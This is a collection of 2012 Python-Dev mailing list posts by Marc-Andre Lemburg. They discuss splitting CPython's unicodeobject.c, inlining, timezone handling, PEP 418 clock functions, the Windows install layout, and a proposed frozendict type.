Link time inlining will usually not be as efficient as compile time
optimization and we need every bit of performance we can get
for Unicode in Python 3.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Split unicodeobject.c into subfiles

2012-10-25 Thread M.-A. Lemburg
On 25.10.2012 08:42, Nick Coghlan wrote:
 unicodeobject.c is too big, and should be restructured to make any
 natural modularity explicit, and provide an easier path for users that
 want to understand how the unicode implementation works.

You can also achieve that goal by structuring the code in unicodeobject.c
in a more modular way. It is already structured in sections, but
there's always room for improvement, of course.

As mentioned before, it is entirely possible to split out various
sections into separate .c or .h files which then get included in the
main unicodeobject.c. If that's where the consensus is going, I'm with
Stephen here in that such a separation should be done in higher-level
chunks, rather than creating 10 new files.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Split unicodeobject.c into subfiles

2012-10-25 Thread M.-A. Lemburg
On 25.10.2012 11:18, Maciej Fijalkowski wrote:
 On Thu, Oct 25, 2012 at 8:57 AM, M.-A. Lemburg m...@egenix.com wrote:
 On 25.10.2012 08:42, Nick Coghlan wrote:
 Why are any of these codecs here in unicodeobjectland in the first
 place?  Sure, they're needed so that Python can find its own stuff,
 but in principle *any* codec could be needed.  Is it just an heuristic
 that the codecs needed for 99% of the world are here, and other codecs
 live in separate modules?

 I believe it's a combination of history and whether or not they're
 needed by the interpreter during the bootstrapping process before the
 encodings namespace is importable.

 They are in unicodeobject.c so that the compilers can inline the
 code in the various other places where they are used in the Unicode
 implementation directly as necessary and because the codecs use
 a lot of functions from the Unicode API (obviously), so the other
 direction of inlining (Unicode API in codecs) is needed as well.
 
 I'm sorry to interrupt, but have you actually measured? What effect
 the lack of said inlining has on *any* benchmark is definitely beyond
 my ability to guess and I suspect is beyond the ability to guess of
 anyone else on this list.
 
 I challenge you to find a benchmark that is being significantly
 affected (15%) with the split proposed by Victor. It does not even
 have to be a real-world one, although that would definitely buy it
 more credibility.

I think you misunderstood. What I described is the reason for having
the base codecs in unicodeobject.c.

I think we all agree that inlining has a positive effect on
performance. The scale of the effect depends on the used compiler
and platform.

Victor already mentioned that he'll check the impact of his
proposal, so let's wait for that.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Split unicodeobject.c into subfiles

2012-10-23 Thread M.-A. Lemburg
On 23.10.2012 10:22, Benjamin Peterson wrote:
 2012/10/22 Victor Stinner victor.stin...@gmail.com:
 Hi,

 I forked CPython repository to work on my split unicodeobject.c project:
 http://hg.python.org/sandbox/split-unicodeobject.c

 The result is 10 files (included the existing unicodeobject.c):

   1176 Objects/unicodecharmap.c
   1678 Objects/unicodecodecs.c
   1362 Objects/unicodeformat.c
253 Objects/unicodeimpl.h
733 Objects/unicodelegacy.c
   1836 Objects/unicodenew.c
   2777 Objects/unicodeobject.c
   2421 Objects/unicodeoperators.c
   1235 Objects/unicodeoscodecs.c
   1288 Objects/unicodeutfcodecs.c
  14759 total

 This is just a proposition (and work in progress). Everything can be changed 
 :-)

 unicodenew.c is not a good name. Content of this file may be moved
 somewhere else.

 Some files may be merged again if the separation is not justified.

 I don't like the unicode prefix for filenames, I would prefer a new 
 directory.

 --

 Shorter files are easier to review and maintain. The compilation is
 faster if only one file is modified.

 The MBCS codec requires windows.h. The whole unicodeobject.c includes
 it just for this codec. With the split, only unicodeoscodecs.c
 includes this file.

 The MBCS codec needs also a winver variable. This variable is
 defined between the BLOOM filter and the unicode_result_unchanged()
 function. How can you explain how these things are sorted? Where
 should I add a new function or variable? With the split, the variable
 is now defined very close to where is it used. You don't have to
 scroll 7000 lines to see where it is used.

 If you would like to work on a specific function, you don't have to
 use the search function of your editor to skip thousands to lines. For
 example, the 18 functions and 2 types related to the charmap codec are
 now grouped into one unique and short C file.

 It was already possible to extend and maintain unicodeobject.c (some
 people proved it!), but it should now be much simpler with shorter
 files.
 
 I would like to repeat my opposition to splitting unicodeobject.c. I
 don't think the benefits of such a split have been well justified,
 certainly not to the point that the claim about much simpler
 maintenance is true.

Same feelings here.

If you do go ahead with such a split, please only split the source
files and keep the unicodeobject.c file which then includes all
the other files. Such a restructuring should not result in compilers
no longer being able to optimize code by inlining functions
in one of the most important basic types we have in Python 3.

Also note that splitting the file into multiple smaller ones will
actually create more maintenance overhead, since patches will likely
no longer be easy to merge from 3.3 to 3.4.

BTW: The positive effect of having everything in one file is that you
no longer have to figure out which file to look in when trying to find
a piece of logic... it's just a Ctrl-F or Ctrl-S away :-)

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Split unicodeobject.c into subfiles?

2012-10-05 Thread M.-A. Lemburg
Victor Stinner wrote:
 Hi,
 
 I would like to split the huge unicodeobject.c file into smaller
 files. It's just the longest C file of CPython: 14,849 lines.
 
 I don't know exactly how to split it, but first I would like to know
 if you would agree with the idea.
 
 Example:
  - Objects/unicode/codecs.c
  - Objects/unicode/mod_format.c
  - Objects/unicode/methods.c
  - Objects/unicode/operators.c
  - etc.
 
 I don't know if it's better to use a subdirectory, or use a prefix for
 new files: Objects/unicode_methods.c, Objects/unicode_codecs.c, etc.
 There is already a Python/codecs.c file for example (same filename).

Better follow the already existing pattern of using unicode as
prefix, e.g. unicodectype.c and unicodetype_db.h.

 I would like to split the unicodeobject.c because it's hard to
 navigate in this huge file between all functions, variables, types,
 macros, etc. It's hard to add new code and to fix bugs. For example,
 the implementation of str%args takes 1000 lines, 2 types and 10
 functions (since my refactor yesterday, in Python 3.3 the main
 function is 500 lines long :-)).
 
 I only see one argument against such refactoring: it will be harder to
 backport/forwardport bugfixes.

When making such a change, you have to pay close attention to
functions that the compiler can potentially inline. AFAIK, moving
such functions into a separate file would prevent such
inlining/optimizations, e.g. the str formatter wouldn't be
able to inline codec calls if placed in separate .c files.

It may be better to split the file into multiple .h files which
then get recombined into the one unicodeobject.c file.
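
For illustration, an include-based split along these lines (all file and
function names below are hypothetical, not the actual CPython source)
keeps everything in one translation unit, so the compiler can still
inline across section boundaries:

```c
/* unicodeobject.c -- a single translation unit, split into sections.
 * Each section would live in its own .h file but gets compiled
 * together, preserving cross-section inlining:
 *
 *   #include "unicode_codecs.h"    UTF-8/16/32 codec implementations
 *   #include "unicode_format.h"    str %% args and str.format()
 *   #include "unicode_methods.h"   upper(), split(), join(), ...
 */

/* A static helper defined in one "section"... */
static int
ascii_only(const unsigned char *s, long n)
{
    long i;
    for (i = 0; i < n; i++)
        if (s[i] > 127)
            return 0;
    return 1;
}

/* ...can still be inlined by the compiler at its call sites in
 * another section, because both end up in the same object file. */
int
needs_utf8_escaping(const unsigned char *s, long n)
{
    return !ascii_only(s, n);
}
```

With separate .c files, `ascii_only` would have to become non-static
(or be duplicated), and inlining would depend on link-time optimization
support in the compiler.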

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] TZ-aware local time

2012-06-06 Thread M.-A. Lemburg
Just to add my 2 cents to this discussion as someone who's worked
with mxDateTime for almost 15 years.

I think we all agree that users of an application want to input
date/time data using their local time (which may very well not be
the timezone of the system running the application). On output
they want to see their timezone as well, for obvious reasons.

Now, timezones are by nature not strictly defined: they have changed
often throughout history and, what's worse, there's no way to predict
timezone details for the future. In many places around the world, the
government defines the timezone data and keeps changing aspects of it
every now and then: introducing daylight savings time, dropping it
again, removing timezones for their countries, adding new ones, or
simply shifting to a different time zone.

The only timezone data that's more or less defined is historic
timezone data, but even there, different sources can give different
data.

What does this mean for the application?

An application doesn't care about the timezone of a point in date/time.
It just wants a standard way to store the date/time and a reliable
way to work with it.

The most commonly used standard for this is the UTC standard and
so it's become good practice to convert all date/time values in
applications to UTC for storage, math and manipulation.

Just like with Unicode, the conversion to local time of the user
happens at the UI level. Conversion from input data to UTC is
easy, given the available C lib mechanisms (relying on the tz
database). Conversion from UTC to local time is more difficult,
but can also be done using the tz database.
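
With a fixed offset standing in for real tz-database lookups (an
assumption made for brevity; the helper names are invented for this
sketch), the convert-at-the-boundary approach looks like:

```python
from datetime import datetime, timedelta, timezone

# Hypothetical user locale: UTC+02:00, taken from the application's
# configuration rather than attached to the stored values themselves.
user_tz = timezone(timedelta(hours=2))

def to_storage(local_dt):
    """Input boundary: interpret naive user input in the user's zone,
    convert to UTC, and store it naive (all stored values are UTC)."""
    aware = local_dt.replace(tzinfo=user_tz)
    return aware.astimezone(timezone.utc).replace(tzinfo=None)

def to_display(utc_dt):
    """Output boundary: render a stored UTC value in the user's zone."""
    return utc_dt.replace(tzinfo=timezone.utc).astimezone(user_tz)

stored = to_storage(datetime(2012, 6, 6, 14, 30))  # user typed 14:30 local
# stored == datetime(2012, 6, 6, 12, 30), i.e. plain UTC
```

All math and comparisons inside the application then happen on the
naive UTC values; timezone knowledge never leaves the two boundary
functions.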

The timezone information of the entered data or the user's
locale is usually available either through the environment,
a configuration file or a database storing the original
data - both on the input and on the output side. There's
no need to stick this information onto the basic data types,
since the application will already know anyway.

For most use cases, this strategy works out really well.
There are some cases, though, where you do need to work with
local time instead of UTC.

One such case is the definition of relative date/time values; a
related one is the definition of repeating date/time values.

These are often defined by users in terms of their local
time or relative to other timezones they intend to
travel to, so in order to convert the definitions back
to UTC you have to run part of the calculation in the
resp. local time zone.

Repeating date/time values also tend to take other data
into account such as bank holidays, opening times, etc.
There's no end to making this more and more complicated :-)

However, these things are not in the realm of a basic type anymore.
They are application-specific details. As a result, it's better to
provide tools to implement all this, but not to try to force design
decisions onto the application writer (which will eventually get in
the way).

BTW: That's the main reason why I have so far refused to add
native timezone support to the mxDateTime data types and
instead let applications decide on the best way for their
particular use case. mxDateTime does provide extra tools for
timezone support, but doesn't get in the way. This approach has
so far worked out really well.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] [RFC] PEP 418: Add monotonic time, performance counter and process time functions

2012-04-15 Thread M.-A. Lemburg
Victor Stinner wrote:
 Hi,
 
 Here is a simplified version of the first draft of the PEP 418. The
 full version can be read online.
 http://www.python.org/dev/peps/pep-0418/
 
 The implementation of the PEP can be found in this issue:
 http://bugs.python.org/issue14428
 
 I post a simplified version for readability and to focus on changes
 introduced by the PEP. Removed sections: Existing Functions,
 Deprecated Function, Glossary, Hardware clocks, Operating system time
 functions, System Standby, Links.

Looks good.

I'd suggest to also include a tool or API to determine the
real resolution of a time function (as opposed to the advertised
one). See pybench's clockres.py helper as example. You often
find large differences between the advertised resolution and
the available one, e.g. while process timers often advertise
very good resolution, they are in fact often only updated
at very coarse rates.

E.g. compare the results of clockres.py on Linux:

Clock resolution of various timer implementations:
time.clock:              1.000us
time.time:               0.954us
systimes.processtime:  999.000us

and FreeBSD:

Clock resolution of various timer implementations:
time.clock: 7812.500us
time.time: 1.907us
systimes.processtime:  1.000us

and Mac OS X:

Clock resolution of various timer implementations:
time.clock:              1.000us
time.time:               0.954us
systimes.processtime:    1.000us
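
A minimal probe in the spirit of clockres.py (a simplified sketch, not
the actual pybench code) measures the smallest non-zero difference
between consecutive timer readings:

```python
import time

def clock_resolution(timer, samples=100):
    """Estimate the effective resolution of a timer function, in
    seconds, as the smallest observed gap between two distinct
    readings."""
    smallest = None
    for _ in range(samples):
        t1 = timer()
        t2 = timer()
        while t2 == t1:          # spin until the clock actually ticks
            t2 = timer()
        diff = t2 - t1
        if smallest is None or diff < smallest:
            smallest = diff
    return smallest

if __name__ == "__main__":
    for name in ("time", "perf_counter", "process_time"):
        timer = getattr(time, name, None)
        if timer is not None:
            print("time.%s: %.3fus" % (name, clock_resolution(timer) * 1e6))
```

The spinning loop is what exposes coarsely updated process timers: the
advertised unit may be microseconds while the measured tick is
milliseconds.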

Regarding changing pybench:
pybench has to stay backwards compatible with
earlier releases to make it possible to compare timings.
You can add support for new timers to pybench, but please leave
the existing timers and defaults in place.

 ---
 
 PEP: 418
 Title: Add monotonic time, performance counter and process time functions
 Version: f2bb3f74298a
 Last-Modified: 2012-04-15 17:06:07 +0200 (Sun, 15 Apr 2012)
 Author: Cameron Simpson c...@zip.com.au, Jim Jewett
 jimjjew...@gmail.com, Victor Stinner victor.stin...@gmail.com
 Status: Draft
 Type: Standards Track
 Content-Type: text/x-rst
 Created: 26-March-2012
 Python-Version: 3.3
 
 Abstract
 
 
 This PEP proposes to add ``time.get_clock_info(name)``,
 ``time.monotonic()``, ``time.perf_counter()`` and
 ``time.process_time()`` functions to Python 3.3.
 
 Rationale
 =
 
 If a program uses the system time to schedule events or to implement
 a timeout, it will not run events at the right moment or stop the
 timeout too early or too late when the system time is set manually or
 adjusted automatically by NTP.  A monotonic clock should be used
 instead to not be affected by system time updates:
 ``time.monotonic()``.
 
 To measure the performance of a function, ``time.clock()`` can be used
 but it is very different on Windows and on Unix.  On Windows,
 ``time.clock()`` includes time elapsed during sleep, whereas it does
 not on Unix.  ``time.clock()`` precision is very good on Windows, but
 very bad on Unix.  The new ``time.perf_counter()`` function should be
 used instead to always get the most precise performance counter with a
 portable behaviour (e.g. include time spent during sleep).
 
 To measure CPU time, Python does not provide directly a portable
 function.  ``time.clock()`` can be used on Unix, but it has a bad
 precision.  ``resource.getrusage()`` can also be used on Unix, but it
 requires to get fields of a structure and compute the sum of time
 spent in kernel space and user space.  The new ``time.process_time()``
 function acts as a portable counter that always measures CPU time
 (doesn't include time elapsed during sleep) and has the best available
 precision.
 
 Each operating system implements clocks and performance counters
 differently, and it is useful to know exactly which function is used
 and some properties of the clock like its resolution and its
 precision.  The new ``time.get_clock_info()`` function gives access to
 all available information of each Python time function.
 
 New functions:
 
 * ``time.monotonic()``: timeout and scheduling, not affected by system
   clock updates
 * ``time.perf_counter()``: benchmarking, most precise clock for short
   period
 * ``time.process_time()``: profiling, CPU time of the process
 
 Users of new functions:
 
 * time.monotonic(): concurrent.futures, multiprocessing, queue, subprocess,
   telnet and threading modules to implement timeout
 * time.perf_counter(): trace and timeit modules, pybench program
 * time.process_time(): profile module
 * time.get_clock_info(): pybench program to display information about the
   timer like the precision or the resolution
 
 The ``time.clock()`` function is deprecated because it is not
 portable: it behaves differently depending on the operating system.
 ``time.perf_counter()`` or ``time.process_time()`` should be used
 instead, depending on your requirements. ``time.clock()`` is marked as
 deprecated but is not planned for removal.
 
 
 Python functions
 
 
 New Functions
 -
 
 

Re: [Python-Dev] Use QueryPerformanceCounter() for time.monotonic() and/or time.highres()?

2012-04-03 Thread M.-A. Lemburg
Victor Stinner wrote:
 You seem to have missed the episode where I explained that caching the last
 value in order to avoid going backwards doesn't work -- at least not if the
 cached value is internal to the API implementation.

 Yes, and I can't find it by briefly searching my mail.  I haven't had the 
 energy to follow every bit of this discussion because it has become 
 completely insane.
 
 I'm trying to complete the PEP, but I didn't add this part yet.
 
 Of course we cannot promise not moving backwards, since there is a 64 bit 
 wraparound some years in the future.
 
 Some years? I computed 584.5 years, so it should not occur in
 practice. 32-bit wraparound is a common issue which occurs in practice
 on Windows (49.7 days wraparound), and I propose a workaround in the
 PEP (already implemented in the related issue).
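
Both figures quoted here are easy to verify with a couple of lines of
arithmetic (assuming a 64-bit counter at nanosecond resolution and a
32-bit counter at millisecond resolution, as on Windows):

```python
SECONDS_PER_YEAR = 365.25 * 24 * 3600

# 64-bit nanosecond counter: wraps after roughly 584.5 years.
years_64bit_ns = 2**64 / 1e9 / SECONDS_PER_YEAR

# 32-bit millisecond counter (GetTickCount): wraps after ~49.7 days.
days_32bit_ms = 2**32 / 1e3 / (24 * 3600)

print(round(years_64bit_ns, 1))  # 584.5
print(round(days_32bit_ms, 1))   # 49.7
```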
 
 Here's actual code from production:

 BOOL WINAPI QueryPerformanceCounterCCP( LARGE_INTEGER* li )
 {
static LARGE_INTEGER last = {0};
BOOL ok = QueryPerformanceCounter(li);
if( !ok )
{
return FALSE;
}
 
 Did you already see it failing in practice? Python ignores the return
 value and only uses the counter value.
 
 Even negative delta values of time are usually  harmless on the application 
 level.
  A curiosity, but harmless.
 
 It depends on your usecase. For a scheduler or to implement a timeout,
 it does matter. For a benchmark, it's not an issue because you usually
 repeat a test at least 3 times. Most advanced benchmarked tools gives
 a confidence factor to check if the benchmark ran fine or not.
 
  I am offering empirical evidence here from hundreds of thousands of 
 computers
 over six years: For timing and benchmarking, QPC is good enough, and will 
 only
 be as precise as the hardware and operating system permits, which in practice
 is good enough.
 
 The PEP contains also different proofs that QPC is not steady,
 especially on virtual machines.

I'm not sure I understand what you are after here, Victor. For benchmarks
it really doesn't matter if one or two runs fail due to the timer having
a problem: you just repeat the run and ignore the false results (you
have such issues in all empirical studies). You're making things
needlessly complicated here.
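The repeat-and-discard approach described above is standard practice for timing code. A minimal sketch (the function name and defaults are illustrative, not taken from pybench):

```python
import time

def bench(func, repeat=3, number=1000):
    """Time `number` calls of func, repeated `repeat` times; keep the minimum.

    Timer glitches and system load can only make a run look *slower*,
    never faster, so the minimum of several runs is the most
    trustworthy figure and outliers are discarded for free.
    """
    timings = []
    for _ in range(repeat):
        start = time.time()
        for _ in range(number):
            func()
        timings.append(time.time() - start)
    return min(timings)
```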

Regarding the approach of trying to cover all timing requirements with
a single time.steady() API, I'm not convinced that this is a good
approach. Different applications have different needs, so it's
better to provide interfaces to what the OS has to offer and
let the application decide what's best.

If an application wants to have a monotonic clock, it should use
time.monotonic(). If the OS doesn't provide it, you get an AttributeError
and can revert to some other function, depending on your needs.
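A sketch of that fallback pattern, in which the application, not the time module, chooses the substitute clock:

```python
import time

# Prefer the OS-provided monotonic clock; fall back explicitly.
# Which fallback is acceptable is an application decision, not
# something a one-size-fits-all API should make on your behalf.
try:
    clock = time.monotonic
except AttributeError:  # older Python / platform without a monotonic clock
    clock = time.time

start = clock()
elapsed = clock() - start
```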

Having a time.steady() API make this decision for you is not
going to make your application more portable, since the choice
will inevitably be wrong in some cases (e.g. falling back from
CLOCK_MONOTONIC to time.time()).

BTW: You might also want to take a look at the systimes.py module
in pybench. We've been through discussions related to
benchmark timing in 2006 already and that module summarizes
the best practice outcome :-)

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Apr 03 2012)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2012-04-03: Python Meeting Duesseldorf today

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python install layout and the PATH on win32 (Rationale part 1: Regularizing the layout)

2012-03-23 Thread M.-A. Lemburg


VanL wrote:
 As this has been brought up a couple times in this subthread, I figured that 
 I would lay out the
 rationale here.
 
 There are two proposals on the table: 1) Regularize the install layout, and 
 2) move the python
 binary to the binaries directory. This email will deal with the first, and a 
 second email will deal
 with the second.
 
 1) Regularizing the install layout:
 
 One of Python's strengths is its cross-platform appeal. Carefully-
 written Python programs are frequently portable between operating
 systems and Python implementations with very few changes. Over the
 years, substantial effort has been put into maintaining platform
 parity and providing consistent interfaces to available functionality,
 even when different underlying implementations are necessary (such
 as with ntpath and posixpath).
 
 One place where Python is unnecessarily different, however, is in
 the layout and organization of the Python environment. This is most
 visible in the name of the directory for binaries on the Windows platform 
 (Scripts) versus the
 name of the directory for binaries on every other platform (bin), but a 
 full listing of the
 layouts shows
 substantial differences in layout and capitalization across platforms.
 Sometimes the include directory is capitalized (Include), and sometimes not; and
 the Python version may or may not be included in the path to the
 standard library.
 
 This may seem like a harmless inconsistency, and if that were all it was, I 
 wouldn't care. (That
 said, cross-platform consistency is its own good). But it becomes a real pain 
 when combined with
 tools like virtualenv or the new pyvenv to create cross-platform development 
 environments.
 
 In particular, I regularly do development on both Windows and a Mac, and then 
 deploy on Linux. I do
 this in virtualenvs, so that I have a controlled and regular environment. I 
 keep them in sync using
 source control.
 
 The problem comes when I have executable scripts that I want to include in my 
 dvcs - I can't have it
 in the obvious place - the binaries directory - because *the name of the 
 directory changes when you
 move between platforms.* More concretely, I can't hg add Scripts/runner.py 
 on my Windows
 environment (where it is put in the PATH by virtualenv) and then do a pull on 
 Mac or Linux and have 
 it end up properly in bin/runner.py, which is the correct PATH for those 
 platforms.
 
 This applies anytime there are executable scripts that you want to manage 
 using source control
 across platforms. Django projects regularly have these, and I suspect we will 
 be seeing more of this
 with the new project support in virtualenvwrapper.
 
 While a few people have wondered why I would want this -- hopefully answered 
 above -- I have not
 heard any opposition to this part of the proposal.
 
 This first proposal is just to make the names of the directories match across 
 platforms. There are
 six keys defined in the installer files (sysconfig.cfg and 
 distutils.command.install): 'stdlib',
 'purelib', 'platlib', 'headers', 'scripts',  and 'data'.
 
 Currently on Windows, there are two different layouts defined:
 
   'nt': {
 'stdlib': '{base}/Lib',
 'platstdlib': '{base}/Lib',
 'purelib': '{base}/Lib/site-packages',
 'platlib': '{base}/Lib/site-packages',
 'include': '{base}/Include',
 'platinclude': '{base}/Include',
 'scripts': '{base}/Scripts',
 'data'   : '{base}',
 },
 
   'nt_user': {
 'stdlib': '{userbase}/Python{py_version_nodot}',
 'platstdlib': '{userbase}/Python{py_version_nodot}',
 'purelib': '{userbase}/Python{py_version_nodot}/site-packages',
 'platlib': '{userbase}/Python{py_version_nodot}/site-packages',
 'include': '{userbase}/Python{py_version_nodot}/Include',
 'scripts': '{userbase}/Scripts',
 'data'   : '{userbase}',
 },
 
 
 The proposal is to make all the layouts change to:
 
   'nt': {
 'stdlib': '{base}/lib',
 'platstdlib': '{base}/lib',
 'purelib': '{base}/lib/site-packages',
 'platlib': '{base}/lib/site-packages',
 'include': '{base}/include',
 'platinclude': '{base}/include',
 'scripts': '{base}/bin',
 'data'   : '{base}',
 },
 
 The change here is that 'Scripts' will change to 'bin' and the capitalization 
 will be removed. Also,
 user installs of Python will have the same internal layout as system 
 installs of Python. This
 will also, not coincidentally, match the install layout for posix, at least 
 with regard to the
 'bin', 'lib', and 'include' directories.
 
 Again, I have not heard *anyone* objecting to this part of the proposal as it 
 is laid out here.
 (Paul had a concern with the lib directory earlier, but he said he was ok 
 with the above).
 
 Please let me know if you have any problems or concerns with this part 1.

Since userbase will usually be a single directory in the home
dir of a user, the above would lose the possibility to support
multiple Python versions 

Re: [Python-Dev] Python install layout and the PATH on win32

2012-03-21 Thread M.-A. Lemburg


Lindberg, Van wrote:
 Mark, MAL, Martin, Tarek,
 
 Could you comment on this?
 
 This is in the context of changing the name of the 'Scripts' directory 
 on windows to 'bin'. Éric brings up the point (explained more below) 
 that if we make this change, packages made/installed with the new packaging 
 infrastructure and those made/installed with bdist_wininst and the old 
 (frozen) distutils will be inconsistent.
 
 The reason why is that the old distutils has a hard-coded dict in 
 distutils.command.install that would point to the old locations. If we 
 were to make this change in sysconfig.cfg, we would probably want to 
 make a corresponding change in the INSTALL_SCHEMES dict in 
 distutils.command.install.

I'm not sure I understand the point in making that change.

Could you expand on the advantage of using bin instead
of Scripts ?

Note that distutils just provides defaults for these installation
locations. All of them can be overridden using command line
arguments to the install command.

FWIW: I've dropped support for bdist_wininst in mxSetup.py
since bdist_msi provides much better system integration.

 More context:
 
 On 3/20/2012 10:41 PM, Éric Araujo wrote:
 On 20/03/2012 21:40, VanL wrote:
 On Tuesday, March 20, 2012 at 5:07 PM, Paul Moore wrote:
 It's worth remembering Éric's point - distutils is frozen and changes
 are in theory not allowed. This part of the proposal is not possible
 without an exception to that ruling. Personally, I don't see how
 making this change could be a problem, but I'm definitely not an
 expert.

 If distutils doesn't change, bdist_wininst installers built using
 distutils rather than packaging will do the wrong thing with regard to
 this change. End users won't be able to tell how an installer has been
 built.
 
 Looking at the code in bdist_wininst, it loops over the keys in the 
 INSTALL_SCHEMES dict to find the correct locations. If the hard-coded 
 dict were changed, then the installer would 'just work' with the right 
 location - and this matches my experience having made this sort of 
 change. When I change the INSTALL_SCHEMES dict, things get installed 
 according to the new scheme without difficulty using the standard tools. 
 The only time when something is trouble is if it does its own install 
 routine and hard-codes 'Scripts' as the name of the install directory - 
 and I have only seen that in PyPM a couple versions ago.
 
 
  From the top of my head the developers with the most experience about
 Windows deployment are Martin v. Löwis, Mark Hammond and Marc-André
 Lemburg (not sure about the Windows part for MAL, but he maintains a
 library that extends distutils and has been broken in the past).  I
 think their approval is required for this kind of huge change.
 
 Note the above - this is why I would like your comment.
 
 
 The point of the distutils freeze (i.e. feature moratorium) is that we
 just can’t know what complicated things people are doing with
 undocumented internals, because distutils appeared unmaintained and
 under-documented for years and people had to work with and around it;
 since the start of the distutils2 project we can Just Say No™ to
 improvements and features in distutils.  “I don’t see what could
 possibly go wrong” is a classic line in both horror movies and distutils
 development *wink*.

 Renaming Scripts to bin on Windows would have effects on some tools we
 know and surely on many tools we don’t know.  We don’t want to see again
 people who use or extend distutils come with torches and pitchforks
 because internals were changed and we have to revert.  So in my opinion,
 to decide to go ahead with the change we need strong +1s from the
 developers I named above and an endorsement by Tarek, or if he can’t
 participate in the discussion, Guido.

 As a footnote, distutils is already broken in 3.3.  Now we give users or
 system administrators the possibility to edit the install schemes at
 will in sysconfig.cfg, but distutils hard-codes the old scheme.  I tend
 to think it should be fixed, to make the distutils-packaging
 transition/cohabitation possible.
 
 Any comment?
 
 Thanks,
 Van
 
 CIRCULAR 230 NOTICE: To ensure compliance with requirements imposed by 
 U.S. Treasury Regulations, Haynes and Boone, LLP informs you that any 
 U.S. tax advice contained in this communication (including any 
 attachments) was not intended or written to be used, and cannot be 
 used, for the purpose of (i) avoiding penalties under the Internal 
 Revenue Code or (ii) promoting, marketing or recommending to another 
 party any transaction or matter addressed herein.
 
 CONFIDENTIALITY NOTICE: This electronic mail transmission is confidential, 
 may be privileged and should be read or retained only by the intended 
 recipient. If you have received this transmission in error, please 
 immediately notify the sender and delete it from your system.
 

-- 
Marc-Andre Lemburg
eGenix.com


Re: [Python-Dev] Add a frozendict builtin type

2012-02-28 Thread M.-A. Lemburg
Victor Stinner wrote:
 See also the PEP 351.
 
 I read the PEP and the email explaining why it was rejected.
 
 Just to be clear: the PEP 351 tries to freeze an object, try to
 convert a mutable or immutable object to an immutable object. Whereas
 my frozendict proposition doesn't convert anything: it just raises a
 TypeError if you use a mutable key or value.
 
 For example, frozendict({'list': ['a', 'b', 'c']}) doesn't create
 frozendict({'list': ('a', 'b', 'c')}) but raises a TypeError.

I fail to see the use case you're trying to address with this
kind of frozendict().

The purpose of frozenset() is to be able to use a set as dictionary
key (and to some extent allow for optimizations and safe
iteration). Your implementation can be used as dictionary key as well,
but why would you want to do that in the first place ?

If you're thinking about disallowing changes to the dictionary
structure, e.g. in order to safely iterate over its keys or items,
freezing the keys is enough.

Requiring the value objects not to change is too much of a restriction
to make the type useful in practice, IMHO.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Add a frozendict builtin type

2012-02-28 Thread M.-A. Lemburg
Steven D'Aprano wrote:
 M.-A. Lemburg wrote:
 Victor Stinner wrote:
 See also the PEP 351.
 I read the PEP and the email explaining why it was rejected.

 Just to be clear: the PEP 351 tries to freeze an object, try to
 convert a mutable or immutable object to an immutable object. Whereas
 my frozendict proposition doesn't convert anything: it just raises a
 TypeError if you use a mutable key or value.

 For example, frozendict({'list': ['a', 'b', 'c']}) doesn't create
 frozendict({'list': ('a', 'b', 'c')}) but raises a TypeError.

 I fail to see the use case you're trying to address with this
 kind of frozendict().

 The purpose of frozenset() is to be able to use a set as dictionary
 key (and to some extent allow for optimizations and safe
 iteration). Your implementation can be used as dictionary key as well,
 but why would you want to do that in the first place ?
 
 Because you have a mapping, and want to use a dict for speedy, convenient 
 lookups. Sometimes your
 mapping involves the key being a string, or an int, or a tuple, or a set, and 
 Python makes it easy
 to use that in a dict. Sometimes the key is itself a mapping, and Python 
 makes it very difficult.
 
 Just google on python frozendict or python immutabledict and you will 
 find that this keeps
 coming up time and time again, e.g.:
 
 http://www.cs.toronto.edu/~tijmen/programming/immutableDictionaries.html
 http://code.activestate.com/recipes/498072-implementing-an-immutable-dictionary/
 http://code.activestate.com/recipes/414283-frozen-dictionaries/
 http://bob.pythonmac.org/archives/2005/03/04/frozendict/
 http://python.6.n6.nabble.com/frozendict-td4377791.html
 http://www.velocityreviews.com/forums/t648910-does-python3-offer-a-frozendict.html
 http://stackoverflow.com/questions/2703599/what-would-be-a-frozen-dict

Only the first of those links appears to actually discuss reasons for
adding a frozendict, but it fails to provide real world use cases and
only gives theoretical reasons for why this would be nice to have.

From a practical view, a frozendict would allow thread-safe iteration
over a dict and enable more optimizations (e.g. using an optimized
lookup function, optimized hash parameters, etc.) to make lookup
in static tables more efficient.

OTOH, using a frozendict as key in some other dictionary is, well,
not a very realistic use case - programmers should think twice before
using such a design :-)

 If you're thinking about disallowing changes to the dictionary
 structure, e.g. in order to safely iterate over its keys or items,
 freezing the keys is enough.

 Requiring the value objects not to change is too much of a restriction
 to make the type useful in practice, IMHO.
 
 It's no more of a limitation than the limitation that strings can't change.
 
 Frozendicts must freeze the value as well as the key. Consider the toy 
 example, mapping food
 combinations to calories:
 
 
 d = { {appetizer = "fried fish", main = "double burger", drink = "cola"}: 5000,
   {appetizer = None, main = "green salad", drink = "tea"}: 200,
 }
 
 (syntax is only for illustration purposes)
 
 Clearly the hash has to take the keys and values into account, which means 
 that both the keys and
 values have to be frozen.
 
 (Values may be mutable objects, but then the frozendict can't be hashed -- 
 just like tuples can't be
 hashed if any item in them is mutable.)

Right, but that doesn't mean you have to require that values are hashable.

A frozendict could (and probably should) use the same logic as tuples:
if the values are hashable, the frozendict is hashable, otherwise not.
